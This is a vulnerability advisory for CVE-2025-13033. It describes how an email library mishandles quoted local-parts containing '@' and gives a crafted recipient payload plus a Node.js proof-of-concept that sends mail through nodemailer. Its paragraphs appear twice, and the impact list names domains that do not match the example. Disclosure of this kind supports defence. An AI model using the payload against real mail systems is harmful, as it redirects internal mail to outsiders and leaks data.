CVE-2025-13033

A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.

A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.

The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target. Payload: `"xclow3n@gmail.com x"@internal.domain` Using the following code to send mail ``` const nodemailer = require("nodemailer"); let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, }); let mailOptions = { from: '"Test Sender" <your_email@gmail.com>', to: "\"xclow3n@gmail.com x\"@internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", }; transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId); }); (async () => { const parser = await import("@sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */); if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; } console.log("Parsed email:", { address: `${parsed.localPart}@${parsed.domain}`, local: parsed.localPart, domain: parsed.domain, }); })(); ``` Running the script and seeing how this mail is parsed according to RFC ``` Parsed email: { address: '"xclow3n@gmail.com x"@internal.domain', local: '"xclow3n@gmail.com x"', domain: 'internal.domain' } ``` But the email is sent to `xclow3n@gmail.com` <img width="2128" height="439" alt="Image" src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d" /> ### Impact: - Misdelivery / Data leakage: Email is sent to psres.net instead of test.com. - Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts. - Potential compliance issue: Violates RFC 5321/5322 parsing rules. - Domain based access control bypass in downstream applications using your library to send mails ### Recommendations - Fix parser to correctly treat quoted local-parts per RFC 5321/5322. - Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.

The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target. Payload: `"xclow3n@gmail.com x"@internal.domain` Using the following code to send mail ``` const nodemailer = require("nodemailer"); let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, }); let mailOptions = { from: '"Test Sender" <your_email@gmail.com>', to: "\"xclow3n@gmail.com x\"@internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", }; transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId); }); (async () => { const parser = await import("@sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */); if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; } console.log("Parsed email:", { address: `${parsed.localPart}@${parsed.domain}`, local: parsed.localPart, domain: parsed.domain, }); })(); ``` Running the script and seeing how this mail is parsed according to RFC ``` Parsed email: { address: '"xclow3n@gmail.com x"@internal.domain', local: '"xclow3n@gmail.com x"', domain: 'internal.domain' } ``` But the email is sent to `xclow3n@gmail.com` <img width="2128" height="439" alt="Image" src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d" /> ### Impact: - Misdelivery / Data leakage: Email is sent to psres.net instead of test.com. - Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts. - Potential compliance issue: Violates RFC 5321/5322 parsing rules. - Domain based access control bypass in downstream applications using your library to send mails ### Recommendations - Fix parser to correctly treat quoted local-parts per RFC 5321/5322. - Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.